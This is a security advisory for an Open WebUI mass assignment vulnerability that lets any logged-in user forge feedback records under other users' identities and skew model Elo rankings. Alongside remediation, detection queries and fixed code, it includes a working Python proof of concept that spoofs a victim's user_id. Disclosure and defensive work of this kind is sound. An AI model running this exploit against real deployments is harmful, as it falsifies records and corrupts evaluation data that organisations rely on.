CVE-2026-45396: open-webui: mass assignment enables leaderboard poisoning

GHSA-rjmp-vjf2-qf4g MEDIUM
Published May 14, 2026
CISO Take

Open WebUI v0.9.2 exposes an authenticated mass assignment flaw in its model evaluation feedback API, where any logged-in user can forge feedback records attributed to arbitrary colleagues—including administrators—by injecting extra fields that Pydantic's extra='allow' configuration willingly accepts, combined with a dict merge order that lets attacker-supplied values silently overwrite server-enforced identity. The practical consequence is Elo leaderboard manipulation: a single malicious insider can inflate or deflate model ratings to steer organizational AI model selection decisions, with no visible audit trail distinguishing legitimate from injected feedback. CVSS scores this Medium (5.4) with no active exploitation or KEV listing, but the integrity risk is substantially higher for organizations using Open WebUI as a formal AI evaluation platform—corrupted benchmark data can directly influence which LLMs enter production, with downstream compliance and business risk. Patch to v0.9.5 immediately; the exploit requires only a valid account and a standard HTTP client, and no workaround is adequate without disabling the evaluation feature entirely.

Sources: NVD, GitHub Advisory, MITRE ATLAS

What is the risk?

CVSS 5.4 Medium understates operational risk for organizations using Open WebUI for AI model governance and selection. Exploitation requires only a standard user account and a single crafted HTTP request—no special tooling, AI/ML knowledge, or elevated privileges needed. The absence of a public exploit or KEV listing reduces immediate mass-exploitation risk, but the low attack complexity makes this a realistic insider threat vector. The package carries 91 historical CVEs and a Package Risk Score of 38/100, indicating systemic security debt; this is the second mass assignment vulnerability from the same root cause class in consecutive releases. The silent, integrity-corrupting nature of the attack—fake records are indistinguishable from legitimate ones without forensic database queries—extends dwell time and complicates post-incident remediation of tainted evaluation data.
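The root cause is ordinary Python dictionary semantics: when the same key appears more than once in a dict literal, the last value wins. A minimal sketch of the vulnerable pattern (field names are illustrative, not Open WebUI's actual code):

```python
# When a dict literal repeats a key, the last occurrence wins.
server_user_id = "attacker-uuid"
form_data = {"type": "rating", "user_id": "victim-uuid"}  # client-controlled

record = {
    "user_id": server_user_id,  # server-enforced identity
    **form_data,                # client data spread AFTER -> overwrites it
}
print(record["user_id"])  # -> victim-uuid

safe = {
    **form_data,                # client data spread FIRST
    "user_id": server_user_id,  # server value last -> always wins
}
print(safe["user_id"])  # -> attacker-uuid
```

This is why the fix is as much about merge order as about `extra='allow'`: either change alone closes the overwrite path, but the patch addresses both.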

Attack Kill Chain

Initial Access
Attacker authenticates to Open WebUI with any valid standard user account, obtaining a Bearer token via the normal sign-in flow—no privilege escalation required.
AML.T0012
Exploitation
Attacker crafts a POST request to /api/v1/evaluations/feedback with injected user_id and version fields that overwrite server-enforced values due to FeedbackForm's extra='allow' configuration and the insecure dict merge order.
AML.T0049
Persistence
Attacker repeats injections across multiple sessions, accumulating falsified rating records attributed to victim users and gradually shifting Elo model rankings without triggering any automated alerts.
AML.T0031
Impact
Corrupted leaderboard data drives organizational AI model selection decisions based on manipulated metrics, while spoofed user attribution permanently taints compliance audit trails and governance evidence.
AML.T0048.001
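The persistence and impact stages work because Elo scores are purely cumulative over feedback records, so a stream of one-sided fake results steadily separates two otherwise equal models. A toy illustration using the standard Elo update with K=32 (Open WebUI's actual rating parameters may differ):

```python
def elo_update(r_winner: float, r_loser: float, k: float = 32.0):
    """One standard Elo update; returns (new_winner, new_loser)."""
    expected_w = 1.0 / (1.0 + 10 ** ((r_loser - r_winner) / 400.0))
    delta = k * (1.0 - expected_w)
    return r_winner + delta, r_loser - delta

model_a, model_b = 1500.0, 1500.0  # start with identical ratings
# 30 injected "wins" for model A with no legitimate feedback to offset them
for _ in range(30):
    model_a, model_b = elo_update(model_a, model_b)

print(round(model_a), round(model_b))  # model A now appears clearly superior
```

A few dozen forged comparisons, spread across sessions to avoid volume anomalies, are enough to move a model from parity to an apparently decisive lead.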

What systems are affected?

Package: open-webui
Ecosystem: pip
Vulnerable Range: < 0.9.5
Patched: 0.9.5
136.3K · Pushed 5d ago · 75% patched · ~4d to patch

Do you use open-webui? Any version below 0.9.5 is affected.

Severity & Risk

CVSS 3.1
5.4 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Attack Surface

Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): None
Integrity (I): Low
Availability (A): Low

What should I do?

6 steps
  1. Patch immediately: upgrade open-webui to v0.9.5, which fixes both the extra='allow' misconfiguration and the insecure dict merge order.

  2. If patching is delayed, disable the evaluation and leaderboard feature in admin settings or restrict POST /api/v1/evaluations/feedback to trusted internal IPs via firewall or reverse proxy ACL.

  3. Detection: query the feedback table for records where user_id does not match the session token user at time of creation; cross-reference with authentication logs for inconsistencies.

  4. Review the admin export endpoint (GET /api/v1/evaluations/feedbacks/export) for anomalous user_id distributions—e.g., implausibly high feedback volumes attributed to senior accounts from a single originating session.

  5. Post-patch: treat all Elo leaderboard data generated under affected versions as untrusted; re-run evaluations before using results for governance or procurement decisions.

  6. Broader hygiene: audit all Pydantic models in your AI application stack for extra='allow' combined with server-trusted field patterns such as user_id, role, or version.
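The detection step can be prototyped offline before running it against production. The sketch below assumes a hypothetical simplified schema (a `feedback` table with `user_id`/`created_at`, and an `auth_log` table of session windows); Open WebUI's real tables will differ, so treat this as a template rather than a drop-in query:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE feedback (id TEXT, user_id TEXT, created_at INTEGER);
CREATE TABLE auth_log (user_id TEXT, login_at INTEGER, logout_at INTEGER);
-- legitimate: alice had an active session when her record was created
INSERT INTO feedback VALUES ('f1', 'alice', 1000);
INSERT INTO auth_log VALUES ('alice', 900, 1100);
-- suspicious: attributed to bob, but bob had no session at that time
INSERT INTO feedback VALUES ('f2', 'bob', 1000);
INSERT INTO auth_log VALUES ('bob', 2000, 2100);
""")

# Feedback records with no matching authentication session at creation time
suspicious = conn.execute("""
    SELECT f.id, f.user_id, f.created_at
    FROM feedback f
    WHERE NOT EXISTS (
        SELECT 1 FROM auth_log a
        WHERE a.user_id = f.user_id
          AND f.created_at BETWEEN a.login_at AND a.logout_at
    )
""").fetchall()
print(suspicious)  # -> [('f2', 'bob', 1000)]
```

Records attributed to a user with no concurrent session are the strongest spoofing signal; records created during a valid session but from an unusual client are weaker and need manual review.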
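The broader Pydantic hygiene audit can be partially automated with a static scan. A rough sketch using only the standard library; it flags `ConfigDict(extra='allow')` call sites and is a heuristic (it will miss class-based `Config` declarations and dynamically built configs), not a complete audit:

```python
import ast

def find_extra_allow(source: str, filename: str = "<src>") -> list[int]:
    """Return line numbers of ConfigDict(extra='allow') calls in source."""
    hits = []
    for node in ast.walk(ast.parse(source, filename)):
        if isinstance(node, ast.Call):
            func = node.func
            name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", "")
            if name == "ConfigDict":
                for kw in node.keywords:
                    if (kw.arg == "extra"
                            and isinstance(kw.value, ast.Constant)
                            and kw.value.value == "allow"):
                        hits.append(node.lineno)
    return hits

sample = """
from pydantic import BaseModel, ConfigDict

class FeedbackForm(BaseModel):
    type: str
    model_config = ConfigDict(extra='allow')
"""
print(find_extra_allow(sample))  # -> [6]

# To scan a whole source tree (hypothetical path):
#   from pathlib import Path
#   for path in Path("backend").rglob("*.py"):
#       if lines := find_extra_allow(path.read_text(), str(path)):
#           print(path, lines)
```

Each hit should then be checked by hand for server-trusted fields (`user_id`, `role`, `version`) flowing into the same constructor.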

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 9 - Risk management system
Article 12 - Record-keeping and logging
ISO 42001
8.4 - AI system data management
9.1 - Monitoring, measurement, analysis and evaluation
NIST AI RMF
MANAGE 2.2 - Mechanisms to respond to and recover from AI risks
OWASP LLM Top 10
LLM04:2025 - Data and Model Poisoning

Frequently Asked Questions

What is CVE-2026-45396?

CVE-2026-45396 is an authenticated mass assignment vulnerability in Open WebUI's model evaluation feedback API (POST /api/v1/evaluations/feedback). Because FeedbackForm uses Pydantic's extra='allow' and the server merges form data after its own values, any logged-in user can inject a user_id field to forge feedback records attributed to other users, including administrators, and thereby manipulate Elo leaderboard rankings. It is rated CVSS 5.4 (Medium) and fixed in v0.9.5; see the CISO Take above for the full risk assessment.

Is CVE-2026-45396 actively exploited?

No confirmed active exploitation of CVE-2026-45396 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-45396?

1. Patch immediately: upgrade open-webui to v0.9.5, which fixes both the extra='allow' misconfiguration and the insecure dict merge order.
2. If patching is delayed, disable the evaluation and leaderboard feature in admin settings or restrict POST /api/v1/evaluations/feedback to trusted internal IPs via firewall or reverse proxy ACL.
3. Detection: query the feedback table for records where user_id does not match the session token user at time of creation; cross-reference with authentication logs for inconsistencies.
4. Review the admin export endpoint (GET /api/v1/evaluations/feedbacks/export) for anomalous user_id distributions—e.g., implausibly high feedback volumes attributed to senior accounts from a single originating session.
5. Post-patch: treat all Elo leaderboard data generated under affected versions as untrusted; re-run evaluations before using results for governance or procurement decisions.
6. Broader hygiene: audit all Pydantic models in your AI application stack for extra='allow' combined with server-trusted field patterns such as user_id, role, or version.

What systems are affected by CVE-2026-45396?

This vulnerability affects the following AI/ML architecture patterns: AI model evaluation platforms, LLM benchmarking and comparison systems, AI governance and compliance audit trails, Enterprise LLM selection workflows, Model serving.

What is the CVSS score for CVE-2026-45396?

CVE-2026-45396 has a CVSS v3.1 base score of 5.4 (MEDIUM).

Technical Details

NVD Description

# Mass Assignment in Feedback Creation Allows User ID Spoofing and Evaluation Data Manipulation

## Summary

The `POST /api/v1/evaluations/feedback` endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via `FeedbackForm`, which uses `model_config = ConfigDict(extra='allow')`. Due to an insecure dictionary merge order in `insert_new_feedback()`, an authenticated attacker can inject a `user_id` field in the request body that overwrites the server-derived value, creating feedback records attributed to any arbitrary user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing.

## Details

The vulnerability exists in two layers:

### 1. Model Layer — Insecure Dict Merge Order

**File:** `backend/open_webui/models/feedbacks.py`, lines 148–160

```python
async def insert_new_feedback(
    self, user_id: str, form_data: FeedbackForm, db: Optional[AsyncSession] = None
) -> Optional[FeedbackModel]:
    async with get_async_db_context(db) as db:
        id = str(uuid.uuid4())
        feedback = FeedbackModel(
            **{
                'id': id,
                'user_id': user_id,         # ← Server-set from auth token
                'version': 0,
                **form_data.model_dump(),   # ← OVERWRITES 'id', 'user_id', 'version'
                'created_at': int(time.time()),
                'updated_at': int(time.time()),
            }
        )
```

In Python, when a dictionary literal contains duplicate keys, the **last value wins**. Since `**form_data.model_dump()` appears after `'user_id': user_id`, any `user_id` field in the form data overwrites the authenticated user's ID.

### 2. Schema Layer — `extra='allow'` on Request Form

**File:** `backend/open_webui/models/feedbacks.py`, line 106

```python
class FeedbackForm(BaseModel):
    type: str
    data: Optional[RatingData] = None
    meta: Optional[dict] = None
    snapshot: Optional[SnapshotData] = None
    model_config = ConfigDict(extra='allow')  # ← Accepts arbitrary extra fields
```

The `extra='allow'` config means Pydantic will accept and preserve any extra fields in the request body, including `user_id`, `id`, and `version`. These are then spread into the `FeedbackModel` constructor, overwriting server-set values.

### Contrast with Secure Pattern

Other models in the same codebase use the correct ordering. For example, `backend/open_webui/models/functions.py`, line 120:

```python
function = FunctionModel(**{
    **form_data.model_dump(),  # ← Spread FIRST
    'user_id': user_id,        # ← Server value AFTER → always wins
})
```

And `ModelForm` at `backend/open_webui/models/models.py` uses `extra='ignore'`, which silently discards unexpected fields (`extra='forbid'` is stricter still, rejecting requests that contain them).

## Impact

### 1. User Identity Spoofing

An attacker can create feedback records attributed to any user by specifying their `user_id`. The admin export endpoint (`GET /api/v1/evaluations/feedbacks/export`) and admin list (`GET /api/v1/evaluations/feedbacks/all`) will show the spoofed `user_id` as the feedback author.

### 2. Model Evaluation Leaderboard Manipulation

The Elo rating system at `backend/open_webui/routers/evaluations.py` computes model rankings directly from feedback records. An attacker can inject fake rating feedback to:

- Artificially inflate ratings for a specific model
- Deflate ratings for competitor models
- Make organizational model evaluation decisions unreliable

### 3. Record ID Control

By injecting a custom `id`, an attacker controls the UUID of the feedback record. While this won't overwrite existing records (primary key constraint), it enables predictable record IDs that could be useful in other attack chains.

## PoC

```python
import requests

BASE_URL = "http://localhost:8080"

# 1. Login as attacker
session = requests.Session()
login_resp = session.post(f"{BASE_URL}/api/v1/auths/signin", json={
    "email": "attacker@example.com",
    "password": "attackerpass"
})
token = login_resp.json()["token"]
headers = {"Authorization": f"Bearer {token}"}

# 2. Create feedback attributed to a different user (victim)
VICTIM_USER_ID = "12345678-aaaa-bbbb-cccc-000000000000"
resp = session.post(
    f"{BASE_URL}/api/v1/evaluations/feedback",
    headers=headers,
    json={
        "type": "rating",
        "data": {
            "model_id": "gpt-4o",
            "rating": 1,
            "sibling_model_ids": ["claude-3-opus"],
        },
        # Mass assignment: these extra fields are accepted due to extra='allow'
        # and overwrite server-set values due to dict merge order
        "user_id": VICTIM_USER_ID,  # Overwrites authenticated user ID
        "version": 999,             # Overwrites default version
    }
)

feedback = resp.json()
print(f"Feedback created with user_id: {feedback['user_id']}")
# Expected: attacker's own user_id
# Actual: VICTIM_USER_ID (12345678-aaaa-bbbb-cccc-000000000000)
assert feedback["user_id"] == VICTIM_USER_ID, "Mass assignment successful!"
```

## Severity

**CVSS 3.1:** 5.4 (Medium) — `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L`

- **Attack Vector:** Network
- **Attack Complexity:** Low
- **Privileges Required:** Low (any authenticated user)
- **User Interaction:** None
- **Impact:** Integrity (feedback data falsification) + limited Availability (leaderboard reliability)

## Suggested Remediation

### Option 1: Fix dict merge order (minimal fix)

```python
feedback = FeedbackModel(
    **{
        **form_data.model_dump(),   # Spread FIRST
        'id': id,                   # Server values AFTER (always win)
        'user_id': user_id,
        'version': 0,
        'created_at': int(time.time()),
        'updated_at': int(time.time()),
    }
)
```

### Option 2: Remove `extra='allow'` from FeedbackForm (recommended)

```python
class FeedbackForm(BaseModel):
    type: str
    data: Optional[RatingData] = None
    meta: Optional[dict] = None
    snapshot: Optional[SnapshotData] = None
    model_config = ConfigDict(extra='ignore')  # Drop unexpected fields ('forbid' rejects them outright)
```

### Option 3: Explicit field assignment (most secure)

```python
feedback = FeedbackModel(
    id=str(uuid.uuid4()),
    user_id=user_id,
    version=0,
    type=form_data.type,
    data=form_data.data.model_dump() if form_data.data else {},
    meta=form_data.meta or {},
    snapshot=form_data.snapshot.model_dump() if form_data.snapshot else {},
    created_at=int(time.time()),
    updated_at=int(time.time()),
)
```

## Affected Versions

- v0.9.2 (latest at time of reporting, confirmed vulnerable)
- Likely all versions since the feedback/evaluation feature was introduced

## References

- Prior advisory: "Mass Assignment via Pydantic extra='allow' Allows Creating Folders in Other Users' Accounts" (patched in v0.9.0) — same root cause class, different endpoint

Exploitation Scenario

An insider at an enterprise deploying Open WebUI for formal AI model evaluation authenticates with their standard user account. Using curl or any HTTP client, they POST to /api/v1/evaluations/feedback with their valid Bearer token, injecting a user_id field pointing to the CISO's account and inflated ratings for a specific model. Because FeedbackForm accepts extra fields and the server dict merge is ordered incorrectly, the record is stored as if submitted by the CISO. Repeated across dozens of evaluations over weeks, this shifts Elo scores enough to make a specific LLM appear to be the consensus top performer among senior stakeholders. When leadership reviews the evaluation dashboard to select an enterprise LLM for a regulated use case, the manipulated scores drive adoption of the attacker's preferred model—potentially one with weaker safety controls—bypassing the organization's AI governance controls with no visible indicator of tampering.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Timeline

Published
May 14, 2026
Last Modified
May 14, 2026
First Seen
May 15, 2026

Related Vulnerabilities